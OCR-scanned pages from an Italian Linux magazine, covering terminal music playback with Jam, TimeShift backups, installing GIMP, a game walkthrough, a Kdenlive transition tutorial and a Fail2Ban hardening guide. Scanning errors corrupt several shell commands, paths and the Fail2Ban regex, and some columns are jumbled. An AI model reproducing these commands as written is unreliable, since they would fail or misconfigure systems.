migliori ricevuti relativamente alla libertà di movimento, alla preci- 
sione e alla configurazione, Rift si rivela attualmente il sistema VR 
migliore. Il nuovo controller rende però più costoso di 200 euro il 
dispendioso acquisto del visore VR. 
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Tips & Tricks 


2 Trucchi e consigli per usare subito GNU/Linux come un esperto, trovare 
soluzioni rapide ai problemi e sfruttare appieno le potenzialità del sistema 


ASCOLTARE MUSICA 
DAL TERMINALE 


{ L'ascolto di brani musicali, lo- 
© cali o in streaming, è una prati- 
ca abbastanza comune quando si sta 
molto tempo al PC. | nostri pezzi pre- 
feriti ci accompagnano durante le no- 
stre giornate di lavoro o anche quan- 
do vogliamo concederci qualche 
minuto di svago. E i numerosi servizi 
di streaming musicale (legali!) ormai 
disponibili da tempo ci agevolano di 
molto la vita. Pensiamo ad esempio a 
YouTube, ormai meta perfetta non 
solo per chi vuole guardare qualche 
video divertente, ma anche per chi 
vuole ascoltare musica in alta qualità. 
Stesso discorso vale per applicazioni 
Web e mobile come Spotify o Play 
Music. Quest'ultimo, portato avanti 
da Google, ci permette di ascoltare 
migliaia di brani utilizzando diretta- 
mente il nostro Google Account. È 
previsto il pagamento di un abbona- 
mento mensile ma, qualora volessimo 
provarlo, potremo usufruire di un pe- 
riodo di prova gratuito che può arriva- 
re anche a 3 mesi: provare, dunque, 
non costa assolutamente nulla. Come 
ascoltare i brani musicali disponibili 
su Play Music? Essenzialmente sono 
disponibili diversi metodi: dallo smar- 


9. Heroes 


E Fig. 1 Il software Jam in azione 
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tphone o dal tablet (utilizzando l'app 
dedicata) o dal PC loggandoci al ser- 
vizio tramite browser. Ma se siamo 
malati di terminale, c'è un curioso sof- 
tware che ci permette di riprodurre 
tutta la musica di Play Music diretta- 
mente da shell. Il suo nome è Jam ed 
è uno di quei programmi che non può 
che far innamorare fin da subito tutti i 
puristi di GNU/Linux. Installare Jam è 
un'operazione abbastanza semplice: 
seppur non banalissima è comunque 
alla portata di tutti. Se stiamo utiliz- 
zando Ubuntu o una sua derivata 
dobbiamo prima verificare che nel si- 
stema siano installati Go, Git e il pac- 
chetto libpulse-dev. In caso contrario, 
possiamo procedere alla loro installa- 
zione lanciando semplicemente sudo 
apt install golang-go git libpulse- 
dev. AI termine del download, ag- 
giungiamo una nuova variabile di am- 
biente (GOPATH). Per farlo, lanciamo 
mkdir -/.go seguito da echo "ex- 
port GOPATH=\$HOME/.go" >> 
-/.bashrc e echo "export PATH= 
\$PATH:\$GOROOT/bin:\$GOPATH 
/bin" >> -/.bashrc. Infine, digitiamo 
source -/.bashrc. A questo punto, 
possiamo procedere con lo scarica- 
mento di Jam con go get github. 
com/budkin/jam. Quando il proces- 


Librar 


so sarà terminato, non ci resta che 
lanciare (sempre da terminale) il co- 
mando jam. Il software ci chiederà di 
digitare l'indirizzo GMail associato al 
nostro account Play Music: inseria- 
molo e confermiamo con Invio. Ora 
è il momento della password, proprio 
quella del Google Account. Superata 
questa fase, il nostro account sarà 
collegato a Jam e saremo pronti ad 
utilizzare Google Play Music anche 
da terminale! 


BACKUP E RESTORE 
DI UBUNTU 


seg, Per quanto affidabili possano 
Boe essere i modelli più costosi e 
performanti, tutti i dischi rigidi (così 
come gli SSD - dischi allo stato soli- 
do) possono cedere e, il più delle vol- 
te, senza darci preavviso. E, nell'ipo- 
tesi che ciò accada, bisogna fare 
qualcosa per metterci al riparo. Il ba- 
ckup è l'unica buona abitudine che ci 
permette di dormire sonni tranquilli 
anche se la maggior parte degli utenti 
sembra dimenticarlo. Ci vorrebbe un 
software in grado di creare una per- 
fetta immagine del sistema (snap- 
shot) e che la ripristini al bisogno, 
vero? Questo software c'è, il suo 
nome è TimeShift ed è studiato appo- 
sitamente per la distro di casa Cano- 
nical. Per installare TimeShift è ne- 
cessario prima aggiungere il giusto 
repository. Avviamo quindi il terminale 
e da qui lanciamo il comando sudo 
apt-add-repository -y ppa:teejee 
2008/ppa. Aggiorniamo l'elenco 
dei pacchetti con sudo apt-get 
update e procediamo al setup di Ti- 
meShift con sudo apt-get install ti- 
meshift. AI termine del download e 


dell'installazione del software, pos- 
siamo spostarci nella Dash di Unity e 
da qui cercare’ ed avviare TimeShift. 
Nella finestra di dialogo che appare, 
digitiamo la password di amministra- 
zione: trattandosi di un software ca- 
pace di effettuare modifiche sostan- 
ziali al sistema, necessita dei giusti 
permessi. Appare dunque l'interfac- 
cia grafica principale del software: 
tutto molto semplice. Da Backup de- 
vice possiamo scegliere su quale di- 
spositivo salvare lo snapshot del si- 
stema (ad esempio un disco 
secondario o una memoria esterna). 
Attenzione: verifichiamo bene che lo 
spazio disponibile sia sufficiente ad 
ospitare l'intera immagine. Quando 
saremo pronti, ci basta cliccare su 
Backup. AI termine, selezionando la 
stessa unità nella quale abbiamo de- 
ciso di salvare lo snapshot, apparirà 
in elenco il nome dell'immagine, così 
come data e ora di creazione. E per il 
ripristino? Tutto altrettanto semplice: 
ci basta selezionare lo snapshot che 
vogliamo ripristinare e cliccare sul 
pulsante Restore. Ma la vera forza di 
TimeShift sta nell'automazione del 
processo di backup del sistema. La 
procedura che abbiamo analizzato 
fino ad ora, infatti, è utile per quegli 
utenti che si ricordano di effettuare 
periodicamente un salvataggio com- 
pleto del sistema. Ma, la maggior par- 
te di noi, purtroppo, il più delle volte 
tende a procrastinare tale operazione. 
A questo ci pensa TimeShift con i 
suoi backup automatici. Per configu- 
rare questa funzionalità, non dobbia- 
mo far altro che accedere nel menu 
Settings e da qui spostarci nel tab 
Schedule. Cliccando sul rispettivo 
flag Enable possiamo decidere se ef- 
fettuare il backup giornalmente, setti- 
manalmente, mensilmente o addirit- 
tura ad ogni riavvio della macchina. E 
per evitare di saturare lo spazio su di- 
sco con decine e ‘decine di snapshot 
ormai non più recenti, possiamo an- 
che fare in modo di eliminare automa- 
ticamente quelli più anziani. Per fare 
ciò, ci basta raggiungere il tab Auto- 
Remove sempre presente in Set- 
tings. Altra peculiarità: durante la cre- 
azione dello snapshot possiamo 
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I! Fig. 2 * L'interfaccia grafica di TimeShift è molto semplice e intuitiva 


scegliere di escludere determinate di- 
rectory: ciò vuol dire che, qualora vo- 
lessimo effettuare il backup di una 
sola parte del sistema (ad esempio 
software e cartelle contenenti docu- 
menti) potremo comunque farlo. 


INSTALLIAMO GIMP 


© Chi l'ha detto che l'editing gra- 
fico è un qualcosa di riservato 
esclusivamente agli utenti Mac OS X 
o Microsoft Windows? Per tanti anni 
abbiamo destinato un'intera sezione 
di Linux Magazine proprio all'editing 
grafico utilizzando, il più delle volte, il 
tool numero uno della manipolazione 
grafica Open Source. Stiamo ovvia- 
mente parlando di GIMP, sempre più 
spesso scelto anche dagli utenti dei 
sistemi operativi proprietari. Anche se 
in un primo momento può sembra ve- 
ramente complesso e macchinoso da 
utilizzare, GIMP segue la classica lo- 
gica grafica dei livelli e ciò semplifica 
di molto la realizzazione anche delle 
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più complesse immagini. In molte di- 
stribuzioni, GIMP viene reso disponi- 
bile out-of-the-box (ovvero, già pre- 
sente fra i pacchetti pre-installati). E 
se non c'è? Considerata la sua popo- 
larità, installare GIMP non poteva che 
essere un'operazione semplice e 
davvero alla portata di tutti. Esiste in- 
fatti un PPA che ci permette di scari- 
care sempre l'ultima versione dispo- 
nibile. Se stiamo utilizzando una 
recente release di Ubuntu o una qual- 
siasi altra distro Debian-like, avviamo 
il terminale e da qui lanciamo il co- 
mando sudo add-apt-repository 
ppa:otto-kesselgulasch/gimp. —Ag- 
giorniamo poi l'elenco dei pacchetti 
con sudo apt update ed infine lancia- 
mo sudo apt install gimp. AI termine 
del setup, potremo avviare GIMP ri- 
cercandolo direttamente dalla Dash 
(se stiamo utilizzando Ubuntu). Infor- 
mazioni sulle funzionalità e guide che 
ci permettono di muovere i primi pas- 
si nel mondo della grafica sono di- 
sponibili sul sito Web www.gimp.org. 
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Mi Fig. 3 © GIMP è il software di manipolazione grafica Open Source più amato dagli utenti 
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Non é Half Life 3, 


ma ne é molto vicino! 


B Un gioco che gravita nell’universo di Half-Life 2. 
Sei pronto a fronteggiare le più strane e terribili creature? 


Licenza: GNU GPL Tipo: Gioco 
Sito Web: http:/\www.transmissions-element120.com/ 


asato sul motore di gioco 
Source Engine (htp://source. 


valvesofiware.com) sviluppato 
dalla statunitense Valve Corporation 
(htip://www.valvesofiware.com/,, au- 
trice anche della piattaforma digitale 
Steam (http://store.steampowered. 
com/,, Transmissions: Element 120 
(da ora TE120 per semplicità) è una 
mod free e single player derivata dallo 
storico Half Life 2. Il 21 Agosto 2016 il 
team di sviluppo ha deciso di rilasciare 
il codice con licenza Open Source. Il 
nome del gioco deriva da un ipotetico 
elemento di nome unbinilio (noto an- 
che come eka-radio), che altro non è 
che un elemento della tavola periodi- 
ca (tavola. di Mendeleev) non ancora 
scoperto, avente come simbolo Ubn e 
numero atomico 120. 


STEAM È INEVITABILE 


Dal sito del gioco cliccando sulla voce 
Download apparirà una piccola sezi- 
one con un pulsante verde Install 
Game: cliccando su di esso verrà 
lanciato il client Steam che pertanto 
dovrà essere installato sul nostro com- 
puter. Da qualche anno oramai tutte le 
distribuzione lo hanno nei propri re- 
pository pertanto non ripetiamo più il 
procedimento. Ricordiamo solo che il 
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Fig. 1 L’oscuro e tenebroso menu di Transmissions: Element 120 


pacchetto che viene installato tramite 
il gestore software della propria dis- 
tribuzione in realtà è un launcher che 
effettuerà dapprima il download quindi 
l’installazione del client in questione. 
Naturalmente necessitiamo anche di 
un account e qualora non lo avessimo 
dovremo procedere alla sua.creazione 
utilizzando o il client oppure registran- 
doci sul sito Steam attraverso le usuali 
e tipiche procedure. Fatto ciò proce- 
diamo utilizzando il client procediamo 
all’installazione (di fatto un downlaod) 
del gioco al termine della quale pos- 
siamo lanciarlo. Dopo qualche secon- 
do ci apparirà il menu generale (Fig. 1) 
con tutti i suoi presagi macabri! 


MISTERIOSO 
DA FAR PAURA! 


Dove siamo? Che giorno è oggi? Che 
ore sono? Perché e chi. ci ha con- 
dotto in questo sconosciuto posto? 
Domande che non avranno risposta 
in TE120 almeno fino a quando non 

inizieremo agiocare! cat se 
Gi risveglieremo in un BUI e sporco 
vagone ferroviario in una non preci- 
sata zona degli ambienti di Half-Life 
2, punto dal quale ha inizio la nostra 
avventura. Nei tutorial che seguono 
abbiamo dato, a differenza di altre 
volte, ampio spazio alle fasi iniziali 
del gioco affinché sia possibile af- 
frontare le prime difficoltà. Il resto 


dovrete farlo da soli in base ai sug- 
gerimenti riportati anche di seguito. 
Giocando, così come dagli screen- 
shot riportati nei vari passi del tuto- 
rial, si possono notare dei codici a 
barre bidimensionali sui muri: sono i 
cosiddetti QR code. 
Durante le sessioni di gioco suggeria- 
mo di leggerli tutti poiché forniscono 
(purtroppo solo .in Inglese poiché il 
gioco non è localizzato in Italiano) una 
serie di suggerimenti lasciati da chi ci 
ha preceduto. Per leggerli (decodifi- 
carli) è sufficiente puntarli e premere 
il tasto Z. Non manteniamo la torcia 
sempre accesa, ma utilizziamola solo 
quando effettivamente ne necessitia- 
mo: ad esempio nei condotti di aera- 
zione o nei condotti fognari dove ef- 
fettivamente è buio ed è un problema 
muoversi. 
Da osservare che al buio gli zombie 
nguono nulla, nemmeno al 
to motivo non utiliz- 
almeno laddove possibile) 
di zombie poiché 


REQUISITI DI SISTEMA 


L'hardware necessario per giocare 


Anche se basato su un motore grafi- 
co “ristrutturato” per l'occasione, le 
risorse necessarie non necessitano di 
macchine di ultima generazione. Per 
assicurarsi un gioco fluido in ogni oc- 
casione ci è sufficiente una CPU (AMD 
o Intel) dual-core da 2.8 GHz, almeno 
2 GB di RAM e una scheda video nVidia 
96006T (o equivalente ATI/AMD) con 


verremo attaccati. Un tale accorgi- 
mento ci ritornerà utile per raggiun- 
gere: il primo step di gioco riportato 
nel quarto passo del terzo tutorial: 
per raggiungere la camera dovremo 
aprire la relativa porta armeggiando 
con un verricello, ma per compiere 
questa azione dovremo gettarci, let- 
teralmente, nella fossa degli zombie e 
questo possiamo farlo solo se le luci 
sono spente così come la nostra tor- 


Giochiamo subito! 


Solo un paio di indicazioni per poi passare all’azione 


new came 
LoAD GAME 
ACHIEVEMENTS 
oPmons 


Ci 


GRAFICA 

E COMANDI 

Dal menu generale:[Fig.:1) 
clicchiamo sulla voce Options. Apparira una 
pop-up con diversi tab. Dal primo, Diffi- 
culty, selezioniamo il livello di difficoltà: 
partiamo da Easy o Normal. Passiamo a 
Keyboard e memorizziamo i comandi e 
infine su Video e Advanced per regolare al 
meglio i parametri grafici. 


SI PARTE! 
02 Ritornati al menu principale 

e clicchiamo su New Game. 
Apparirà la pop-up omonima nella 
quale selezioneremo l'unico capitolo 
al momento attivo, Chapter1 Wake. | 
rimanenti si attiveranno con il proce- 
dere del gioco. Selezionato il capitolo 
clicchiamo sul pulsante Start new 
game per iniziare. 


1 GB di memoria video e accelerazio- 
ne 3D in hardware attivata previo uso 
dei driver proprietari. Risorse minori 
fanno girare il gioco a patto di esse- 
re meno “aggressivi” con le richieste 
grafiche. Lo spazio su disco si aggira 
intorno ai 2,5 GB. In quanto single pla- 
yer il titolo non necessita di una con- 
nessione ADSL. 


cia. Altro elemento sensibile alla luce 
sono i mitragliatori automatici i quali, 
prima di iniziare a sparare, puntano il 
bersaglio da dove arriva la luce emet- 
tono degli avvisi acustici e iniziano a 
sparare solo dopo circa 1 secondo. 
Questo ci fornisce un leggero vantag- 
gio perché possiamo sempre accen- 
dere per brevi flash la torcia al fine 
di capire in che punto della stanza ci 
troviamo. 


IL RISVEGLIO 


Dopo un'introduzione brevissi- 

ma, e praticamente al buio, ini- 
zieremo dall'interno di un vagone merci 
ferroviario. Spostiamoci verso la luce che 
penetra dalla portiera accostata e una 
volta vicino a essa pigiamo il tasto E per 
aprirla. Scendiamo dal vagone. Quanto 
visibile in figura è l'ambiente che ci si 
prospetta davanti! 
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APRIRE LA PORTA 
Procediamo verso l'ultimo vago- 
ne presente sul binario. Le sca- 
tole che ostacolano il cammino possiamo 
spostarle o prenderle [tasto E) e rilasciarle 
(stesso tasto): una scatola di legno dovremo 
utilizzarla per salire sull'ultimo vagone e 
prendere il crowbar (levachiodi o piede di 
porco] appoggiato sul bancale. 


Proseguiamo con la missione 


Indietro non si può tornare. L'unica soluzione è andare avanti! 


prendiamo il contenuto della 
scatola. Scendiamo, passiamo 
davanti al soldato morto e pren- 
diamo l'arma. Accendiamo la 
torcia e percorriamo il condotto 
che sbuca in un'altra camera: 
gli strani esseri appesi al soffitto 
possono agguantare tutto ciò 
che passa di li! 


VARIE CAMERE 


camera in fondo 
vedremo una piccola luce. È il 
laser del mitragliatore auto- 
matico. Il sistema è sensibile 
alla luce pertanto se provas- 
simo ad accendere la torcia si 
metterebbe subito in funzione 
sparando in direzione della 
luce. Per capire dove siamo 
seguiamo il suggerimento ri- 
portato nell'articolo. Scivoliamo 
dal condotto e procediamo. 


PRONTI PER IL BUIO? 
Torniamo indietro, saliamo la 
scaletta e con il piede di porco 
spacchiamo il lucchetto. A partire da questo 
punto inizia la nostra avventura. Apriamo la 
porta, accendiamo la torcia [tasto F] ed ecco 
la prima persona ammazzata! Non possia- 
mo fare nulla per lui. Nel passargli davanti 


gli prenderemo l'arma presente ai suoi piedi. 


AMBIENTI 
RIFINITI 


Arrivati in cima, 


Entrati nella nuova 


I PRIMI ESSERI! 

Procediamo con cautela perche 

da lì a pochi metri dovremo ab- 
battere il primo ragno gigante e solo dopo 
proseguire. Ma dopo pochi metri ecco 
un'altra nuova creatura ostacolarci il cam- 
mino: uno zombie. Inutile dire che dovremo 
abbatterlo. Prima di procedere nel condotto 
saliamo la scaletta sul muro opposto. 


RIMANERE 
AL BUIO! 
Abbattiamo lo zom- 

bie che vuole entrare nella 

sezione recintata e nella quale 
non possiamo accedere. Giria- 
moci sulla piattaforma di ce- 

mento fino a trovare un tombi- 
no: scendiamo nel sotterraneo 

e procediamo nel condotto: ma 

prima di entrare nella camera 

spegniamo la torcia! 


PRIMO 

TRAGUARDO 

Un primo passo è il 
raggiungimento della camera 
dove è presente la'prima vera 
arma, lo Zero Point Energy 
Projector che permette di fare 
salti di diversi metri, atterrare 
in modalità soft, distruggere 
pareti e molto altro ancora. 
Per comprenderne l'uso è suf- 
ficiente puntare sul muro con 
su scritto MIKE, premere il 
tasto Z e leggere le istruzioni. 
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Da una stanza 
all'altra... in un clic! 


Grazie a Kdenlive possiamo far passare la nostra 
videocamera attraverso un muro, spostando l'inquadratura 
della nostra ripresa in un ambiente diverso. Ecco come fare 


in stanze affiancate: nelle grandi produzioni cinematografiche 

spesso si realizza l’ormai classica sequenza in cui la cinepre- 
sa passa attraverso il muro. Nel film “una pallottola spuntata” 
si scherza anche su questo argomento. Infatti, in una ripresa di 
questo tipo, improvvisamente Leslie Nielsen passa attraverso il 
muro proprio come la videocamera rivelando quindi il trucco. Se 
abbiamo un gran budget possiamo costruire il nostro set cinema- 
tografico con muri finti davanti ai quali far scorrere la cinepresa. 
Ma se non abbiamo molti soldi da spendere, e ci dispiacerebbe 
fare un buco nel muro di casa per farci passare una cinepresa, la 
soluzione migliore è affidarsi alla computer grafica. Il metodo che 
implementeremo è quello con il più basso costo possibile e con- 
siste nel realizzare due riprese distinte, una nella prima stanza ed 
una nella seconda, unendole poi con Kdenlive usando una transi- 
zione che fornisca l'illusione del passaggio da una stanza all'altra. 
L’idea di base è ovviamente molto semplice: sfruttando le transi- 


n molti film si ha la necessità di presentare eventi che accadono 


Due stanze, due clip 


zioni di tipo Affine che Kdenlive ci mette a disposizione, possia- 
mo far slittare la prima clip video fuori dallo schermo, ad esempio 
spingendola verso sinistra, e possiamo contemporaneamente far 
entrare la seconda clip video sfruttando un’altra transizione Affine. 
Naturalmente, tra le due clip lasceremo qualche pixel di spazio, 
per simulare l’interno del muro. Ma potrebbe non essere abba- 
stanza: il problema è che quando si fa davvero passare una cine- 
presa attraverso un muro, si ottiene ovviamente un cambiamento 
nella prospettiva, perché la lente della cinepresa si fa sempre più 
vicina al muro e le linee sembrano molto più lunghe del normale. 
Per simulare questa specifica caratteristica, sarebbe necessario 
utilizzare un ambiente di modelling 3D come Blender ed il came- 
ra mapping. Ma questo richiederebbe un notevole quantitativo di 
tempo, e può essere esagerato per un piccolo filmato casalingo. 
Per fortuna le ultime versioni di Kdenlive offrono l’effetto Corners. 
Questo effetto ci permette di modificare separatamente i 4 angoli 
di una clip: spostandoli possiamo quindi cambiare la prospettiva. 


Posizioniamo correttamente le clip riprese nelle due stanze da affiancare 
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LA PRIMA STANZA 
Per il nostro filmato servono due clip: una che ri- 
prende la prima stanza, l’altra che riprende la se- 


- conda stanza. La clip della prima stanza deve essere inserita 
nella traccia Video2, ovvero quella di mezzo. 


| Monitor progetto | 


pe mxn | 


ORA LA SECONDA 
La clip della seconda stanza, invece, va posizionata nella 


traccia Video3, ovvero nella traccia che si trova sopra 
alla Video2. Provvediamo già ad allineare le due clip di modo che 
siano sovrapposte per qualche secondo. 
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Nello specifico, possiamo dare l'illusione che la cinepresa si 
stia avvicinando al muro se manteniamo gli angoli che nella 
scena ripresa si trovano vicino al muro nella stessa posizione 
in cui si trovano (per esempio gli angoli a destra della prima 
clip) e spostiamo invece gli altri due (quindi quelli a sinistra per 
la prima clip) in modo da disegnare un trapezio isoscele la cui 
base maggiore è rappresentata proprio dal lato compreso tra 
questi due angoli (cioè il lato a sinistra per la prima clip e quello 
a destra per la seconda clip). L'effetto è chiaramente approssi- 
mativo, perché se si osservano gli oggetti nella scena ci si ac- 
corge che non seguono le regole di prospettiva considerato che 
tutto appare come se fosse appiattito sullo sfondo, ma se viene 
realizzato abbastanza velocemente si può ingannare l'occhio 
dello spettatore realizzando un passaggio realistico attraverso il 
muro. Ecco un esempio: www.edmaster.it/url/6571. 


BI Fig. 1 - La transizione tra le due stanze 


Prepariamo la transizione 


‘Cominciamo ad animare la prima della due clip 
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Colori di base 
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"UNA CLIP COLORE 
0 1 Aggiungiamo una clip colore (Project/Aggiungi clip 
colore). Possiamo scegliere il colore che preferiamo: 
sarà quello che rappresenterà la parte interna del muro. Di solito 
si sceglie un colore scuro, o uno più vicino a quello delle pareti. 


prietà 


Bin effects for C 
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= = UNA TRANSIZIONE 
03 Aggiungiamo una transizione tra la clip della traccia 
Video2 e Video1. La transizione deve essere di tipo 
Affine, e deve essere rivolta alla traccia Video1. Per il momento, 
lasciamo le impostazioni così come sono. 
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TUTTA LA DURATA 


02 


Clip colore 


La clip colore va posizionata in Video1, e deve durare 


fino alla fine della clip della seconda stanza. Infatti, 


00:00:21:08 


questa clip sarà anche la base della nostra composizione. Se si de- 
sidera, si può sempre cambiare colore o scegliere una immagine. 


ad 


Dimensione | 100,00%] [Opacità A ss 100%| 

\ Rotazione asse X 0 | [Rotazione asse Y po 0 | [Rotazione asse z 0) 

Distorsione fa) 

[correggi il ritaglio sull'asse Y i È 0) 

[Correggi il ritaglio sull'asse X | 0 | 
IL PUNTO DI INIZIO 


04 Posizioniamoci un attimo prima dell'inizio della secon- 
da clip, ed impostiamo un fotogramma chiave. Questo 


sarà l'inizio dell'animazione di scorrimento delle due scene, quindi 
per ora non modifichiamo le impostazioni del frame chiave. 


RENDIAMO INCREDIBILE L'EFFETTO 


Questo tipo di sequenze richiede un obiettivo di tipo grandangolare, 
di modo che le linee di prospettiva siano molto allungate e si pos- 
sa avvertire facilmente il movimento della cinepresa. Ovviamente, 
l’obiettivo utilizzato nella prima stanza dovrebbe essere lo stesso 
della seconda, considerato che in teoria si tratta sempre della stessa 
videocamera che passa attraverso il muro. Nel filmato di esempio, 
si può notare come l'animazione sia decisamente più credibile nella 
prima stanza che nella seconda. Questo perché nella prima stanza 
la cinepresa era posizionata più vicina al muro. Per migliorare il re- 
alismo, si dovrebbe cercare di avvicinare la videocamera al muro 
quanto più possibile: questo permette di ridurre l’entità della modi- 
fica prospettica da effettuare in post produzione. In fase di editing 
è importante impostare una dimensione del muro (lo spazio tra le 
due clip, nel tutorial è di 50 punti) congrua con l’obiettivo che è stato 
utilizzato: il muro non deve sembrare troppo largo o troppo sottile. 


Animazione conclusa! 
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II Fig. 2 - L'effetto Corese permette di impostare uno stretch 


Spostiamo le due clip sincronizzandole i in modo da lasciare uno spazio tra di loro 


Monitor progetto E 


LO SPAZIO DEL MURO 

Adesso ci posizioniamo proprio all'inizio della clip del- 
la seconda stanza e, lavorando sulla transizione Affine, 
aggiungiamo un nuovo frame chiave. Questo frame va realizzato 
spostando di poco l’immagine, impostando X al valore -50. 
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ENTRA LA SECONDA 

Adesso applichiamo lo stesso tipo di transizione anche 

alla clip della traccia Video3, riferendola sempre alla 
traccia Video1. Il suo primo fotogramma chiave deve avere il va- 
lore X impostato a 1920, cioè la larghezza della clip (se in Full HD). 
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ESCE LA PRIMA CLIP 

0 Ora andiamo al punto in cui prevediamo che la teleca- 


mera debba essere passata completamente alla se- 
conda stanza ed aggiungiamo un nuovo frame chiave nella transi- 
zione Affine. Questo avrà come X il valore -1970. 
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LA POSIZIONE ZERO 

Ci spostiamo ora nel momenti in cui abbiamo concluso 

il movimento della clip Video2 e, in quella stessa posi- 
zione, aggiungiamo un nuovo fotogramma chiave alla transizione 
della traccia Video3, impostando il suo valore X a 0. 


0080 
008 
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Stiamo attenti alla prospettiva 


Per rendere la scena più realistica, modifichiamo la prospettiva dell'inquadratura 


od Proprietà 


(BI) Effetti per C0021.MP4 


@ + Mute 
Nome v Mati PR IA ISAIA 
E - Ccomers 


(0028.MP4 
00:00:34:02 [1] {. 
|Corner1Y 
Clip colore {corner2X 
00:00:05:00 (11 {corner 2Y 
— RARE SA TETTE ENTE TED verrei 
EFFETTO CORNERS 


Aggiungiamo alla clip di Video2 un effetto Corners. Po- 

sizioniamoci nel punto in cui cominciamo a muovere la 
clip per farla scivolare fuori dallo schermo, ed aggiungiamo un fo- 
togramma chiave dell'effetto con feather alpha pari a 0. 
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LA PROSPETTIVA 

La prima distorsione deve essere leggera, sono passati 

solo pochi secondi. Poi ci spostiamo nella posizione in 
cui termina il movimento della clip Video2 ed aggiungiamo un altro 
frame chiave dell'effetto, modificando però di molto la prospettiva. 
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DIREZIONE OPPOSTA 

Tornando all’inizio della clip della traccia Video3, ag- 

giungiamo un frame chiave e modifichiamo le posizioni 
dei 4 angoli di modo che la prospettiva si sposti nella direzione op- 
posta rispetto a quella della clip precedente. 
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ECCO GLI ANGOLI 
2 Spostiamoci al momento in cui comincia l'animazione 
della clip di Video3 e, sempre lavorando sull'effetto 
corners, aggiungiamo un fotogramma chiave. Qui cominciamo a 
spostare i singoli angoli della clip per distorcere la prospettiva. 
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LA SECONDA CLIP 
0 b, Adesso impostiamo un effetto di tipo Corners anche 
alla clip della traccia Video3. In questo caso, ci spostia- 
mo nel punto in cui la clip ha smesso di muoversi lungo lo schermo 
ed impostiamo un fotogramma chiave dell'effetto. 
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COLORE DEL MURO 

Ora l'animazione è pronta: se vogliamo, è addirittura 

possibile aggiungere in sovraimpressione una nuova 
traccia con un pezzo di muro che copra lo spazio tra le due clip, 
animandolo con una transizione di tipo Affine. 


PROTEGGI 


IL TUO SISTEMA! 


Il modo migliore per difenderti è bloccare le connessioni 
sospette o i tentativi di login. Quello che ti serve è Fail2Ban 


Raspberry Pi hanno portato una grande inno- 

vazione: visto il loro bassissimo costo, sia per 

l’acquisto che per il mantenimento, è ormai di- 
ventato possibile per chiunque realizzare un piccolo 
server personale, magari per memorizzare qualche 
file importante, raggiungibile da qualsiasi parte del 
mondo. L'idea è semplice: si tiene un Raspberry Pi 
come server domestico e nella sua memoria inseria- 
mo i file che possono tornarci utili. Quando avremo 
bisogno di questi ultimi, non dobbiamo far altro che 
accedere al Raspberry Pi da remoto, magari tramite 
SSH o FIP e prelevarli. Tuttavia, questa procedura 
può generare una problematica che, spesso, gli uten- 
ti meno esperti non sanno come affrontare: quella 
dei pirati. Un server, infatti, è ovviamente esposto 
ai tentativi di accesso da parte di tutti. Scegliere una 
buona password per proteggerlo è obbligatorio, ma 
potrebbe non essere sufficiente. Infatti, la maggior 
parte dei pirati, quando scopre il nostro indirizzo IP 
tenta di accedere provando decine di password ca- 
suali ogni secondo, sperando di indovinare la nostra. 
Il problema è che è solo una questione di tempo: 


prima o poi ci riusciranno. Inoltre, i loro numerosi 
tentativi possono addirittura finire col saturare il Ra- 
spberry Pi di richieste e rallentarlo di molto. L’unica 
soluzione può essere costituita dal firewall: dobbia- 
mo cercare di identificare i pirati e bannarli dal no- 
stro server rifiutando automaticamente tutte le con- 
nessioni dai computer malevoli. E, per riconoscere 
i PC dei pirati da quelli degli utenti veri, possiamo 
proprio capire quali sistemi facciano ripetuti tenta- 
tivi di login sbagliando la password. Il programma 
Fail2Ban si occupa proprio di questo: monitora con- 
tinuamente i tentativi di login e se un certo computer 
(identificato dal suo indirizzo IP) sbaglia più volte 
di seguito la password lo inserisce nella blacklist 
di iptables, il firewall del kernel Linux che rifiuta 
quindi automaticamente le connessioni. Questo non 
solo garantisce la sicurezza, perché ogni pirata ha 
appena un paio di tentativi per indovinare la nostra 
password invece di averne infiniti, ma anche le pre- 
stazioni, visto che dopo il ban ogni comunicazione 
dall’indirizzo IP bannato viene rifiutata automatica- 
mente e quindi non impegna il processore. 


a 


Ora possiamo cominciare a configurare Fail- 

2Ban. Basta lanciare il comando sudo nano /etc/ 
fail2ban/jail.conf. Le tre opzioni importanti sono bantime, 
findtime e maxretry. Dei buoni valori possono essere 604800 
(una settimana) per i primi due e poi 3. 


Per cominciare, avviamo l'installazione di 

Fail2Ban. Su un sistema Debian-like si può fare 
semplicemente lanciando il comando sudo apt-get install 
fail2ban. Questo vale quindi anche per la maggior parte 
delle distro per Raspberry Pi, basate su Raspbian. 
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CREIAMO UN FILTRO 


Fail2Ban funziona analizzando i file di log dei vari server: SSH registra i ten- 
tativi di accesso con le utenze di sistema nel file /var/log/auth.log, mentre il 
questi file contengono molte altre informazioni, quindi è necessario un filtro 
per estrarre soltanto gli indirizzi IP dei pirati dai vari log: si utilizza una regex, 
un'espressione regolare. I filtri più importanti sono già forniti con l’installa- 
zione di Fail2Ban, ma altri devono essere scritti manualmente. Ad esempio, 
per controllare i falliti tentativi di accesso al server di posta elettronica Postfix 
basta creare il file /etc/fail2ban/filter.d/postfix-auth.conf e scrivere al suo 


interno: 
[Definition] 
failregex = (Pi): warning: 
[-._\w]}+\[\]: SASL 
(?:LOGIN|PLAIN| (?:CRAM|DIGEST) -MD$ 
ignoreregex = 


Come si può vedere, la riga failregex contiene l’espressione regolare che 


Blocchiamo gli IP 


Scriviamo le jail e controlliamo che funzionino 


Abbiamo visto come impostare le tre variabili 

generali più importanti, ma ora bisogna creare 

le varie jail: una per ogni server che vogliamo 
proteggere. Nel testo di questo articolo spieghiamo come 
scrivere le regole delle jail. 


Possiamo vedere tutti i tentativi di accesso (SSH o 

FTP) al sistema lanciando il comando sudo lastb. 

La prima colonna indica il nome utente con cui si 
è eseguito il tentativo di login, la terza l'IP di chi ha tentato 
l'accesso. 


S i s t e m al 


identifica gli errori di Postfix (che, per la cronaca, vengono registrati nel file 
Ivar/log/syslog). 


CONFIGURIAMO FAIL2BAN 


È possibile trovare il filtro pronto all’uso per il server che ci interessa sempli- 
cemente cercandolo su un motore di ricerca come Google. Con i filtri si pos- 
sono poi stabilire le varie jail (letteralmente “prigioni”), una dedicata ad ogni 
programma. Le jail vengono memorizzate nel file /ete/fail2ban/jail.conf ed 
indicano le varie opzioni per il controllo degli accessi ad un server. Per esem- 
pio, per proteggere Postfix usando il filtro che abbiamo appena descritto sarà 
necessario aggiungere al file delle jail la sezione: 


[postfix-auth] 


enabled = true 

port = smtp, ssmtp 
filter = postfix-auth 
logpath = /var/log/syslog 


archimedes : — Konsole 


Modifica Visualizza Segnalibri Impostazioni Aiuto 


Scritte le modifiche necessarie, si può salvare il 

